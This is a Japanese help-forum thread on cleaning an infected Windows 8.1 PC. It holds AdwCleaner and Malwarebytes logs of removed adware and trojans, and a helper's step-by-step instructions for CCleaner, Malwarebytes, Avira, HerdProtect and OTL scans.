# AdwCleaner v4.200 - ログファイルの作成日 04/04/2015 作成時間 19:51:45
# 更新日 29/03/2015 作成元 Xplode
# データベース : 2015-03-29.1 [ローカル]
# オペレーティングシステム : Windows 8.1 (x64)
# ユーザー名 : ryota - NAMETUKI
# 実行場所 : C:\Users\ryota\Desktop\adwcleaner_4.200.exe
# オプション : 削除

***** [ サービス ] *****

[#] サービス 削除済み項目 : 2e873f60

***** [ ファイル / フォルダ ] *****

フォルダ 削除済み項目 : C:\ProgramData\Intelewin filter
フォルダ 削除済み項目 : C:\ProgramData\Performance Optimizer
フォルダ 削除済み項目 : C:\ProgramData\634f3b4dc3b0241a
フォルダ 削除済み項目 : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlvPlayer
フォルダ 削除済み項目 : C:\Program Files (x86)\Tweaks
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\baidu
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\OpenCandy
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\KyK6@ymFhfOn.org
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\QoDQ@B.com
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\Rw@pKVf9.net
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\sK8@H4N8xo.org
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_dlnembnfbcpjnepmfjmngjenhhajpdfd_0.localstorage
ファイル 削除済み項目 : C:\END
ファイル 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\searchplugins\trovi-search.xml
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_firefox.softonic.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_firefox.softonic.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_hajimeshiki.blog38.fc2.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_hajimeshiki.blog38.fc2.com_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_i-funbox.softonic.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_i-funbox.softonic.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_jp.hao123.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_jp.hao123.com_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tomigaoka-hs.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tomigaoka-hs.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal

***** [ スケジュールタスク ] *****

タスク 削除済み項目 : Digital Sites
タスク 削除済み項目 : EPUpdater
タスク 削除済み項目 : Price Meter Updater
タスク 削除済み項目 : pricemeterdownloader
タスク 削除済み項目 : PriceMeterLiveUpdateUpdateTaskMachineCore
タスク 削除済み項目 : PriceMeterLiveUpdateUpdateTaskMachineUA
タスク 削除済み項目 : RegClean Pro
タスク 削除済み項目 : SaveSense
タスク 削除済み項目 : SaveSenseLiveUpdateTaskMachineCore
タスク 削除済み項目 : SaveSenseLiveUpdateTaskMachineUA
タスク 削除済み項目 : SpeedUpMyPC
タスク 削除済み項目 : spmonitor
タスク 削除済み項目 : WOT N
タスク 削除済み項目 : WOT T
タスク 削除済み項目 : WOT W1
タスク 削除済み項目 : WOT W2
タスク 削除済み項目 : WOT WFRI1
タスク 削除済み項目 : WOT WMON1
タスク 削除済み項目 : WOT WTHUR1
タスク 削除済み項目 : WOT WTUE1
タスク 削除済み項目 : WOT WW1
タスク 削除済み項目 : WOT WW2
タスク 削除済み項目 : WOT WWED1

***** [ ショートカット ] *****

ショートカット 駆除済み項目 : C:\Users\ryota\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk

***** [ レジストリ ] *****

キー 削除済み項目 : HKLM\SOFTWARE\Classes\S
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.OneClickCtrl.9
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.OneClickProcessLauncherMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.Update3WebControl.3
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CoCreateAsync.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CoreMachineClass.1
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CredentialDialogMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.OnDemandCOMClassMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.OnDemandCOMClassMachineFallback.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.ProcessLauncher.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3COMClassService
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3WebMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3WebMachineFallback.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\speedupmypc
キー 削除済み項目 : HKLM\SOFTWARE\e1316ce5-ccf0-cdcd-6fb9-2933b402fd24
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{00A154AE-6C33-4F1E-9057-242350540936}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{1070C156-160B-47A0-B7D9-1860396BAB57}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{126C78A0-36E7-4697-A3AB-32706144398B}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{27CE191D-733B-4450-AFCD-096D105288C3}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{30D1E30D-B7F5-4C7A-8EDA-9F02966538A8}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{39A29266-D3E4-462D-AB05-F93B1053F6CF}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{41C35ADE-DEDA-439F-8140-D53F2C76C963}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{4211E851-747F-4470-923D-6EF683EE79CA}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{44FC7A33-2E5C-48DC-B6F5-B81E8005D122}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{45F8961E-1314-421E-9F00-BDDE18CF8EA0}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{4825ACAD-F495-4CDD-9603-9C91BABB2B88}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{5B60D1C0-453A-485D-AE91-61FAC9203719}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{73192D81-6D24-4C40-BF7B-2507C6FA0B1A}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{74930D00-2198-46FE-B6BC-FEEC60C666C9}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{88C606E7-BA26-41CB-8CC3-D1E313E34E75}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{89449F37-4AB2-46ED-A566-BB3A7797701B}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{8D73A258-9787-4AE7-9232-41036673FD0E}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{93D3100A-BBB6-456C-96FC-82CAC5F383AC}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{997E3BFB-F821-411C-8B96-D61D415EC8FA}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{9D24562E-40EC-4E46-B57C-700352059B55}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{9E0546FF-D44F-4FE4-A324-995FCACB8D33}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{B1F29F0C-2EC8-487B-97C2-8B8FEA6CEF14}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{C0756D99-64A1-4332-B783-A5A1B571D431}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{CDDAB3A4-E64D-4AE0-9E1D-F3132F5F913F}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{CF0A778A-DDA0-4492-9804-EF38C9A9F1A5}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{D1C6444C-CC06-4060-A486-736DEAFD9C16}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{D8746A3A-A372-4C8B-96E5-B58F6474EB19}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{E66A759D-367F-433E-85C6-ED7F040BCC32}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{F4B8D46C-4EEE-401B-8607-DC03025F34B1}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{F509ADC2-B40E-470F-A7B7-45191486B5CB}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{2105FE20-DEBD-4084-A306-61C5DA001CCA}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{41F978F3-431A-4464-A789-5C0692D562FB}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{7D0F8586-7AD5-44A7-BD3D-31E63B3F18D2}
キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{89310413-97E0-4F09-AA75-390A7F4D4918}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{89449F37-4AB2-46ED-A566-BB3A7797701B}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F509ADC2-B40E-470F-A7B7-45191486B5CB}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{27CE191D-733B-4450-AFCD-096D105288C3}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30D1E30D-B7F5-4C7A-8EDA-9F02966538A8}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89449F37-4AB2-46ED-A566-BB3A7797701B}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F509ADC2-B40E-470F-A7B7-45191486B5CB}
キー 削除済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\F3A4A002FE7B4E04B8CC3B6516EB89BE
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{34A5152D-6D2E-400E-8A6F-4882264D556B}
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{4DD7187B-2366-2589-3BF1-3871B30945B3}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DEC8B1CF-C7B3-40DF-B08A-3449CEA511DC}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DEC8B1CF-C7B3-40DF-B08A-3449CEA511DC}
キー 削除済み項目 : HKCU\Software\PriceMeterLiveUpdate
キー 削除済み項目 : HKCU\Software\PriceMeterUpdater
キー 削除済み項目 : HKCU\Software\Softonic
キー 削除済み項目 : HKCU\Software\Baidu
キー 削除済み項目 : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
キー 削除済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
キー 削除済み項目 : HKLM\SOFTWARE\FlvPlayer
キー 削除済み項目 : HKLM\SOFTWARE\PriceMeterLiveUpdate
キー 削除済み項目 : HKLM\SOFTWARE\Uniblue
キー 削除済み項目 : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
キー 削除済み項目 : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Baidu
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PriceMeterLiveUpdate.exe
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com

***** [ Webブラウザ ] *****

-\\ Internet Explorer v11.0.9600.17416

設定 復元済み項目 : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
設定 復元済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
設定 復元済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v37.0.1 (x86 ja)

[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.newtab.url", "hxxp://www.trovi.com/?gd=&ctid=CT3318522&octid=EB_ORIGINAL_CTID&ISID=M4EE90A50-3AE9-4F68-8525-05C99AEDA898&SearchSource=69&CUI=&SSPV=&Lay=1&UM=6&UP=SP18F052A5-8E24-4DA[...]
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.search.defaultenginename", "Trovi search");
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.search.selectedEngine", "Trovi search");
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.startup.homepage", "hxxp://searchy.easylifeapp.com/");

-\\ Google Chrome v34.0.1847.131

[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Web Data] - 削除済み項目 [Search Provider] : hxxp://www.softonic.jp/s/{searchTerms}
[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Preferences] - 削除済み項目 [Homepage] : hxxp://searchy.easylifeapp.com/
[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Preferences] - 削除済み項目 [Startup_URLs] : hxxp://searchy.easylifeapp.com/

-\\ Comodo Dragon v


-\\ Chrome Canary v


*************************

AdwCleaner[R0].txt - [19876 bytes] - [12/05/2014 00:29:23]
AdwCleaner[R1].txt - [973 bytes] - [13/05/2014 20:20:03]
AdwCleaner[R2].txt - [14101 bytes] - [04/04/2015 19:50:36]
AdwCleaner[S0].txt - [18836 bytes] - [12/05/2014 00:31:09]
AdwCleaner[S1].txt - [1028 bytes] - [13/05/2014 20:21:13]
AdwCleaner[S2].txt - [13124 bytes] - [04/04/2015 19:51:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [13184 bytes] ##########

ACのログを確認いたしましたが、壮絶です。
ACは不要となりますので、ACを起動させてアンインストールボタンを押して削除なされてください。

そしてひとつご案内が抜けておりました。
CCのIEタブのログが出ておりませんでした。
こちらも処置しておかないと残ったままとなりますので、
次回のログのご提示の際にこちらもお願いいたします。

HJTでまだ処置すべきログが残っておりますが、
こちらは後にご案内するOTLで処置することにしましょう。

以下のソフトウェアをご用意ください。

Malwarebytes Anti-Malware（通称:MBAM）
旧バージョンダウンロード↓（ファイル直リンクです。表示して数秒後にダウンロード開始の表示が出ます）
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
最新バージョンには動作しなくなるなどの不具合があるため、ここでは旧バージョンを利用します。
インストールの最後に出てくるMalwarebytes Anti-Malware Pro版の無料試用を開始する。のチェックを外します。
このソフトウェアは日本語対応ではありますが、初回起動時は文字化けしておりますので、以下の手順で日本語化を行ってください。
MBAMを起動させてください。
MBAMを起動時に自動アップデートが始まります。
最新バージョンをダウンロードしたと表示されたら、必ずキャンセルを押してください。
次にウイルス定義ファイルのアップデートが始まりますので、アップデート終了までお待ちください。
ウイルス定義ファイルのバージョンアップが完了すると、再度最新バージョンをダウンロードしたと出ますので、
再びキャンセルを押してアップデートを中止してください。
MBAMが起動したら設定タブを開き、Languageの項目の部分をJapaneseに再度変更することで日本語化が可能です。
この段階ではスキャンは行いませんので、設定が完了したらMBAMを終了させておいてください。
最新バージョンと旧バージョンは操作方法が大幅に異なりますので、
万一バージョン2.0以降を導入されてしまった場合はご連絡ください。
片付け時はセーフモードからGeekを利用してアンインストールしてください。

ここで使うのはFree（無償版）です。

準備が完了しましたら作業を開始いたします。
CCを起動させ、ツール→スタートアップの各項目を開き、
該当するものを無効→エントリの削除の順番でクリックしてください。

Windows
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll

Firefox
有効 Extension AAlllSaveer 1.4 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\Rw@pKVf9.net
有効 Extension DaigiCoupon 5.3 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\QoDQ@B.com
有効 Extension UnIDealsi 2.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\KyK6@ymFhfOn.org
有効 Extension youtubeadblocker 1.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\sK8@H4N8xo.org

Google Chrome
有効 Extension BlocKUTubEADi 3.2 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0

スケジュールされたタスク
有効 Task avaavxvyex C:\Users\ryota\AppData\Local\avaavxvyex\avaavxvyex.exe
有効 Task Lyrics-Fan Update C:\Program Files (x86)\Lyrics_Fan\lrcsfans.exe /c
有効 Task {0601D1B3-F740-46AF-A550-6AFEBF819572} Microsoft Corporation C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\TKFE\ihs.exe" -c -dir "C:\Program Files (x86)\TKFE\"

無効にできないもの、既に無効になっているものはそのままエントリの削除を、
エントリが存在しない場合は放置で先に進みましょう。
またGoogle Chrome等で削除ができない場合も放置で先に進みましょう。
CCでの作業が完了しましたら、PCをセーフモードで起動してください。
MBAMを起動させます。
フルスキャンを選択し、スキャン開始をクリックします。
スキャン終了まで30分～1時間半程度お待ちください。
スキャンが完了したら、詳細を表示をクリックします。
検出されたものの一覧が出ますので、検出されたものすべてを駆除するため、
検出されたものの左側にあるチェックボックスすべてにチェックを入れます。
すべての箇所にチェックを入れたら選択されたアイテムを隔離ボタンを押します。
処置の設定が完了するとPCの再起動を促されますので、指示に従って通常モードで再起動してください。
再起動前後にログが出ますので、取得されたログを貼り付け、ご報告をお願いいたします。

ただいま上記の作業を終えてきました。
以下にログを貼っておくので指示をお願いします。

IE
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll


MBAM

Malwarebytes Anti-Malware (試用) 1.75.0.1300
www.malwarebytes.org

定義バージョン： v2013.04.04.07

Windows 8 x64 NTFS (セーフモード)
Internet Explorer 11.0.9600.17690
ryota :: NAMETUKI [管理者]

リアルタイム保護: 無効

2015/04/04 21:41:01
mbam-log-2015-04-04 (21-41-01).txt

スキャンタイプ： フルスキャン (C:\|D:\|E:\|F:\|)
有効なスキャン領域： メモリ | スタートアップ | レジストリ | ファイルシステム | ヒューリスティック/追加アイテムのスキャン　 | ヒューリスティック/Shuriken　エンジンを使用してスキャン　 | 不審なプログラム　（PUP） | 不審な変更　（PUM）
無効なスキャン領域: ピア・ツー・ピアプログラム（P2P）
スキャンしたアイテム数: 460260
経過時間： 44 分, 3 秒

メモリプロセスの検出: 0
(悪意のあるアイテムは検出されていません。)

メモリモジュールの検出: 0
(悪意のあるアイテムは検出されていません。)

レジストリキーの検出: 8
HKCR\CLSID\{B83FC273-3522-4CC6-92EC-75CC86678DA4} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\TypeLib\{AAB6BCE3-1DF6-4930-9B14-9CA79DC8C267} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\Interface\{DF692509-D9EF-48A0-9CD0-3AA5B81F6F68} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\CnsHelper.CH.1 (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\CnsHelper.CH (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCU\SOFTWARE\3721 (PUP.BitSpirit) -> 正常に隔離され削除されました。
HKLM\SOFTWARE\3721 (PUP.BitSpirit) -> 正常に隔離され削除されました。
HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\!CNS (Adware.CnsMin) -> 正常に隔離され削除されました。

レジストリ値の検出: 2
HKCU\Software\Microsoft\Internet Explorer\Main|CNSReset (Adware.CnsMin) -> データ: 3194082933 -> 正常に隔離され削除されました。
HKCU\Software\Microsoft\Internet Explorer\Main|CNSHint (Adware.CnsMin) -> データ: 1 -> 正常に隔離され削除されました。

レジストリデータ項目の検出: 0
(悪意のあるアイテムは検出されていません。)

フォルダの検出: 0
(悪意のあるアイテムは検出されていません。)

ファイルの検出: 6
C:\Windows\Downloaded Program Files\CnsMin.dll (Adware.CnsMin) -> 正常に隔離され削除されました。
C:\Program Files\JWord_pino\CnsMin.dll (Adware.CnsMin) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\Backup\x86_microsoft-windows-atl_31bf3856ad364e35_6.3.9600.16384_none_3fc0044d754c0225_atl.dll_0c7220db (Trojan.FakeMS) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-atl_31bf3856ad364e35_6.3.9600.16384_none_3fc0044d754c0225\atl.dll (Trojan.FakeMS) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-vcm-core-codecs_31bf3856ad364e35_6.3.9600.16384_none_01428598f4095f36\iccvid.dll (Trojan.FakeAlert) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-vcm-core-codecs_31bf3856ad364e35_6.3.9600.17415_none_018f2074f3cfcbbe\iccvid.dll (Trojan.FakeAlert) -> 正常に隔離され削除されました。

(終)

以上です。

最初の段階でもご案内いたしましたが、ソフトウェアの不正入手のために利用されることが多い、
BitSpiritと呼ばれるBitTorrentクライアントと言うP2Pファイル共有ソフトが入っていました。
検出されたのはそれの設定情報だけですので、まだ本体はどこかに眠っている可能性があります。
MBAMは必要ありませんので、導入時の指示に従って削除なされてください。

CCを起動させ、ツール→スタートアップ→Internet Explorerのタブを開き、
以下を無効→エントリの削除の順番でクリックを行ってください。

有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll

削除が完了しましたら、CCを終了させてください。
Windows標準のWindows Defenderでは性能が低いため、別途セキュリティソフトを手配しましょう。

Avira Free Antivirus
http://www.avira.com/ja/download?product=avira-free-antivirus

McAfee SiteAdvisor
https://www.siteadvisor.com/

Aviraはインストール時に設定が必要となりますので、以下に記述いたします。
インストールタイプの選択では、「カスタム」を選択して同意し次へをクリックします。
ターゲットフォルダの選択ではそのまま次へを選択します。
コンポーネントのインストールもそのまま次へを選択します。
Avira コミュニティもそのまま次へを選択します。
デスクトップアイコン以下略もそのまま次へを選択します。
インストールが完了するまで少々お待ち下さい。
インストールが完了すると構成ウィザードへようこそと言う画面が出ますので、次へを選択します。
AHeADの構成の項目は、高検出レベルに変更して次へを選択します。
脅威カテゴリ(拡張)の選択の項目はすべて選択のチェックボックスにチェックして次へを選択します。
システムスキャンの項目はそのまま次へを選択します。
完了ボタンを押して終了します。
その後McAfee SiteAdvisorのインストールを行い、ブラウザを一度閉じて起動し直してください。
新しいアドオンが検出されますので、導入を行ってください。
導入が完了しましたら一度PCを再起動させてください。
PCの再起動が完了しましたら、Aviraを起動させ、更新の開始をクリックします。
その後システムのスキャンの横の歯車のマークをクリックし、設定を表示させてください。
ファイルの項目をすべてのファイルに変更を行います。
その他の設定の項目を一番下の項目以外全チェック状態に変更します。
適用→OKの順番にクリックして設定画面を閉じます。
システムのスキャンの文字をクリックしてスキャンを行ってください。
スキャンが完了するとレポートボタンが出ますので、そちらを押してログを出力してください。
ログは長文となる可能性がありますので、状況に応じて分割してご連絡ください。

遅くなりまして申し訳ないです。諸事情でＰＣを長らく触れていませんでしたのでレスポンスが遅くなりました。
つきまして、本日自分が久しぶりにＰＣを触ったのですが、症状が悪化してるように見えます。
家族に現状を説明していたのですが自分の力不足で改善されているように思えません。
今後はルールを定めて不正利用はさせないようにします。

本題ですが

最初の段階でもご案内いたしましたが、ソフトウェアの不正入手のために利用されることが多い、
BitSpiritと呼ばれるBitTorrentクライアントと言うP2Pファイル共有ソフトが入っていました。
検出されたのはそれの設定情報だけですので、まだ本体はどこかに眠っている可能性があります。
MBAMは必要ありませんので、導入時の指示に従って削除なされてください。

以上のレスポンスの意味が自分には分かりませんので具体的対策及び、以上のファイルがどこにあるのかがわかるようでしたら教えて頂きたいです。

またＡＶＩＲＡのインストール後に説明されていた画面になりません。
スクリーンショットを添付しますのでご確認お願いします。

画像が小さくて内容がよく確認できませんので、別のツールで色々と調べてみましょう。

以下のソフトウェアをご用意ください。

HerdProtect(通称:HP)
http://www.herdprotect.com/downloads.aspx
インストール版でもポータブル版でも構いません。
インストール版の場合、アンインストールの際は、セーフモードでGeekを利用してアンインストールされてください。
また、トレンドマイクロのウイルスバスターとの相性が悪いとの報告も受けております。
相性の問題でスキャンが正常にできないときは、その旨をご報告ください。
さらに、本ソフトウェアにより検出されたものすべてがマルウェアと言うわけではありません。
HPは駆除機能もありますが、まずは駆除は行わず、検出のみに使用いたします。

OldTimer Listit(通称:OTL)
http://oldtimer.geekstogo.com/OTL.exe
直リンクです。デスクトップ等、分かりやすい場所に保存してください。
削除する際は起動後に「Cleanup」ボタンを押すことにより、自動的に削除されます。

準備ができましたら、まずゲームのインストーラーなど、極端に重たいファイルがある場合は、
そちらの不要ファイルを事前にPC内から手動削除し、ごみ箱からも消しておいてください。
これらをHPが不審プログラムとして拾うと、1日や2日は平気でスキャンにかかってしまいます。
PCが通常モードで起動していることを確認し、HerdProtectを起動させます。
ソフトウェアの特性として、ファイルのスキャンにインターネット回線を利用します。
インターネット回線がご利用できないセーフモード時では正常に動作しませんので、
セーフモードで起動中の場合は通常モードに切り替えてください。
Scanボタンがありますので、こちらを押してスキャンを行ってください。
スキャンに必要な情報を収集したり、発見された不審なソフトウェアを
各種セキュリティソフトで調査している間は、スキャン作業が停止します。
スキャンが進行しないからと言ってフリーズしたわけではありませんので、
スキャンが完了するまで今しばらくお待ちください。
スキャンが完了しましたらスキャン結果が表示されますので、
画面右上にあるSave resultsという文字をクリックしてログを出力してください。
ログは任意のお名前をつけて、分かりやすいところに保存してください。

以下をメモ帳にコピペしてください。

------コピペこの下より------
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
CREATERESTOREPOINT
------コピペこの上まで------

コピペが完了しましたら、任意のお名前をつけて分かりやすい場所に保存されてください。
保存が完了しましたら、PCをセーフモードで起動させてください。
OTLを起動させ、表示画面上部中央にあるScan All Usersにチェックを入れてください。
設定が完了しましたら、Custom Scan/Fixesの項目内に先ほど保存したメモ帳の内容を貼り付けてください。
